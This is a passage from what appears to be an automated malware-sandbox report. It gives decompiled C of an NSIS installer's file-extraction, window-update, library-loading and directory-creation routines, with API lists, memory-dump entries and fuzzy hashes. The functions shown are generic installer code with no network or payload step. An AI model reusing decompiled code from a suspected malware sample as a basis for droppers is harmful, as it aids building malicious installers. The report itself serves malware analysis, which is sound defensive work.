						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp");
						_t64 = E00405B9D("C:\Users\hardz\AppData\Local\Temp\nszAAC8.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                                                                          0x0040176f
                                                                                                                                                                          0x00401776
                                                                                                                                                                          0x00401782
                                                                                                                                                                          0x00401785
                                                                                                                                                                          0x0040178a
                                                                                                                                                                          0x0040178d
                                                                                                                                                                          0x00401794
                                                                                                                                                                          0x004017b0
                                                                                                                                                                          0x00401796
                                                                                                                                                                          0x00401797
                                                                                                                                                                          0x00401797
                                                                                                                                                                          0x004017b6
                                                                                                                                                                          0x004017bb
                                                                                                                                                                          0x004017bb
                                                                                                                                                                          0x004017bf
                                                                                                                                                                          0x004017c2
                                                                                                                                                                          0x004017c7
                                                                                                                                                                          0x004017c9
                                                                                                                                                                          0x004017cb
                                                                                                                                                                          0x004017d0
                                                                                                                                                                          0x004017d0
                                                                                                                                                                          0x004017db
                                                                                                                                                                          0x004017db
                                                                                                                                                                          0x004017ec
                                                                                                                                                                          0x004017ee
                                                                                                                                                                          0x004017ee
                                                                                                                                                                          0x004017ef
                                                                                                                                                                          0x004017ef
                                                                                                                                                                          0x004017f2
                                                                                                                                                                          0x004017f5
                                                                                                                                                                          0x004017f8
                                                                                                                                                                          0x004017f8
                                                                                                                                                                          0x004017ff
                                                                                                                                                                          0x0040180e
                                                                                                                                                                          0x00401813
                                                                                                                                                                          0x00401816
                                                                                                                                                                          0x00401819
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040181b
                                                                                                                                                                          0x0040181e
                                                                                                                                                                          0x00401874
                                                                                                                                                                          0x00401879
                                                                                                                                                                          0x004015b6
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x0040292e
                                                                                                                                                                          0x00402c2a
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401820
                                                                                                                                                                          0x00401826
                                                                                                                                                                          0x0040182d
                                                                                                                                                                          0x0040183a
                                                                                                                                                                          0x00401845
                                                                                                                                                                          0x0040185b
                                                                                                                                                                          0x0040185b
                                                                                                                                                                          0x0040185e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401864
                                                                                                                                                                          0x00401864
                                                                                                                                                                          0x00401865
                                                                                                                                                                          0x00401882
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00402c33
                                                                                                                                                                          0x00401867
                                                                                                                                                                          0x00401867
                                                                                                                                                                          0x00401868
                                                                                                                                                                          0x00401493
                                                                                                                                                                          0x0040239d
                                                                                                                                                                          0x0040239d
                                                                                                                                                                          0x0040239d
                                                                                                                                                                          0x00401865
                                                                                                                                                                          0x0040185e
                                                                                                                                                                          0x00402c35
                                                                                                                                                                          0x00402c39
                                                                                                                                                                          0x00402c39
                                                                                                                                                                          0x00401892
                                                                                                                                                                          0x00401897
                                                                                                                                                                          0x004018a5
                                                                                                                                                                          0x004018aa
                                                                                                                                                                          0x004018b0
                                                                                                                                                                          0x004018b4
                                                                                                                                                                          0x004018b6
                                                                                                                                                                          0x004018be
                                                                                                                                                                          0x004018ca
                                                                                                                                                                          0x004018b8
                                                                                                                                                                          0x004018b8
                                                                                                                                                                          0x004018bc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004018bc
                                                                                                                                                                          0x004018d3
                                                                                                                                                                          0x004018d9
                                                                                                                                                                          0x004018db
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004018e1
                                                                                                                                                                          0x004018e1
                                                                                                                                                                          0x004018e4
                                                                                                                                                                          0x004018fc
                                                                                                                                                                          0x004018e6
                                                                                                                                                                          0x004018e9
                                                                                                                                                                          0x004018f2
                                                                                                                                                                          0x004018f2
                                                                                                                                                                          0x00401901
                                                                                                                                                                          0x00401906
                                                                                                                                                                          0x00402398
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402398
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                                                                                                            • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                            • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                            • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll), ref: 0040560C
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp$C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll$Call
                                                                                                                                                                          • API String ID: 1941528284-817622757
                                                                                                                                                                          • Opcode ID: aa03b608055256b08c5230b635091723166b86c1387160db22f84a077ec9c951
                                                                                                                                                                          • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                                                                          • Opcode Fuzzy Hash: aa03b608055256b08c5230b635091723166b86c1387160db22f84a077ec9c951
                                                                                                                                                                          • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040559F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                                                                                                          0x004055a5
                                                                                                                                                                          0x004055af
                                                                                                                                                                          0x004055b4
                                                                                                                                                                          0x004055ba
                                                                                                                                                                          0x004055c5
                                                                                                                                                                          0x004055c8
                                                                                                                                                                          0x004055cb
                                                                                                                                                                          0x004055d1
                                                                                                                                                                          0x004055d1
                                                                                                                                                                          0x004055d7
                                                                                                                                                                          0x004055df
                                                                                                                                                                          0x004055e2
                                                                                                                                                                          0x004055ff
                                                                                                                                                                          0x00405603
                                                                                                                                                                          0x0040560c
                                                                                                                                                                          0x0040560c
                                                                                                                                                                          0x00405616
                                                                                                                                                                          0x0040561f
                                                                                                                                                                          0x0040562b
                                                                                                                                                                          0x00405632
                                                                                                                                                                          0x00405636
                                                                                                                                                                          0x00405639
                                                                                                                                                                          0x0040564c
                                                                                                                                                                          0x0040565a
                                                                                                                                                                          0x0040565a
                                                                                                                                                                          0x0040565e
                                                                                                                                                                          0x00405660
                                                                                                                                                                          0x00405663
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405663
                                                                                                                                                                          0x004055e4
                                                                                                                                                                          0x004055ec
                                                                                                                                                                          0x004055f4
                                                                                                                                                                          0x004055fa
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004055fa
                                                                                                                                                                          0x004055f4
                                                                                                                                                                          0x004055e2
                                                                                                                                                                          0x0040566f

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                          • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00422A37,74E5EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll), ref: 0040560C
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
                                                                                                                                                                          • API String ID: 1495540970-3801560312
                                                                                                                                                                          • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                          • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                          • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                          • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040689A, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                                                                          0x004068b1
                                                                                                                                                                          0x004068ba
                                                                                                                                                                          0x004068bc
                                                                                                                                                                          0x004068bc
                                                                                                                                                                          0x004068c0
                                                                                                                                                                          0x004068d3
                                                                                                                                                                          0x004068cd
                                                                                                                                                                          0x004068cd
                                                                                                                                                                          0x004068cd
                                                                                                                                                                          0x004068ec
                                                                                                                                                                          0x00406900
                                                                                                                                                                          0x00406907

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                          • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                          • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                          • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                          • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                          • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405A6E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                          0x00405a79
                                                                                                                                                                          0x00405a7d
                                                                                                                                                                          0x00405a80
                                                                                                                                                                          0x00405a86
                                                                                                                                                                          0x00405a8a
                                                                                                                                                                          0x00405a8e
                                                                                                                                                                          0x00405a96
                                                                                                                                                                          0x00405a9d
                                                                                                                                                                          0x00405aa3
                                                                                                                                                                          0x00405aaa
                                                                                                                                                                          0x00405ab1
                                                                                                                                                                          0x00405ab9
                                                                                                                                                                          0x00405abb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405abb
                                                                                                                                                                          0x00405ac5
                                                                                                                                                                          0x00405acc
                                                                                                                                                                          0x00405ae2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00405ae4
                                                                                                                                                                          0x00405ae8

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                          • API String ID: 3449924974-3916508600
                                                                                                                                                                          • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                          • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                                                                          • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E41817, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                          			E72E41817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x72e4506c = _a8;
				 *0x72e45070 = _a16;
				 *0x72e45074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x72e45048, E72E41651);
				_push(1); // executed
				_t37 = E72E41BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E72E4243E(_t54);
					}
					_push(_t54);
					E72E42480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E72E42655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E72E41666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E72E42655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E72E42655();
							_t37 = GlobalFree(E72E41312(E72E41654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E72E42618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E72E415DD( *0x72e45068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E72E42E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E72E42B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E72E42810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                                                                                                          0x72e41817
                                                                                                                                                                          0x72e41817
                                                                                                                                                                          0x72e41817
                                                                                                                                                                          0x72e41824
                                                                                                                                                                          0x72e4182c
                                                                                                                                                                          0x72e41839
                                                                                                                                                                          0x72e41847
                                                                                                                                                                          0x72e4184a
                                                                                                                                                                          0x72e4184c
                                                                                                                                                                          0x72e41851
                                                                                                                                                                          0x72e41856
                                                                                                                                                                          0x72e41978
                                                                                                                                                                          0x72e41978
                                                                                                                                                                          0x72e4185c
                                                                                                                                                                          0x72e41860
                                                                                                                                                                          0x72e41863
                                                                                                                                                                          0x72e41868
                                                                                                                                                                          0x72e41869
                                                                                                                                                                          0x72e4186a
                                                                                                                                                                          0x72e41870
                                                                                                                                                                          0x72e41876
                                                                                                                                                                          0x72e418a6
                                                                                                                                                                          0x72e418ad
                                                                                                                                                                          0x72e418d1
                                                                                                                                                                          0x72e4191e
                                                                                                                                                                          0x72e4191f
                                                                                                                                                                          0x72e418d3
                                                                                                                                                                          0x72e418d3
                                                                                                                                                                          0x72e418d4
                                                                                                                                                                          0x72e418dd
                                                                                                                                                                          0x72e418de
                                                                                                                                                                          0x72e418e8
                                                                                                                                                                          0x72e418eb
                                                                                                                                                                          0x72e418f0
                                                                                                                                                                          0x72e418f7
                                                                                                                                                                          0x72e418f7
                                                                                                                                                                          0x72e418fd
                                                                                                                                                                          0x72e418fe
                                                                                                                                                                          0x72e41904
                                                                                                                                                                          0x72e4190a
                                                                                                                                                                          0x72e41917
                                                                                                                                                                          0x72e41918
                                                                                                                                                                          0x72e4191b
                                                                                                                                                                          0x72e418af
                                                                                                                                                                          0x72e418af
                                                                                                                                                                          0x72e418b0
                                                                                                                                                                          0x72e418c5
                                                                                                                                                                          0x72e418c5
                                                                                                                                                                          0x72e41929
                                                                                                                                                                          0x72e4192c
                                                                                                                                                                          0x72e41939
                                                                                                                                                                          0x72e41940
                                                                                                                                                                          0x72e41948
                                                                                                                                                                          0x72e4194b
                                                                                                                                                                          0x72e4194b
                                                                                                                                                                          0x72e41948
                                                                                                                                                                          0x72e41958
                                                                                                                                                                          0x72e41960
                                                                                                                                                                          0x72e41965
                                                                                                                                                                          0x72e41958
                                                                                                                                                                          0x72e4196d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e4196f
                                                                                                                                                                          0x72e41970
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41970
                                                                                                                                                                          0x72e4196d
                                                                                                                                                                          0x72e4187a
                                                                                                                                                                          0x72e4187d
                                                                                                                                                                          0x72e4189b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
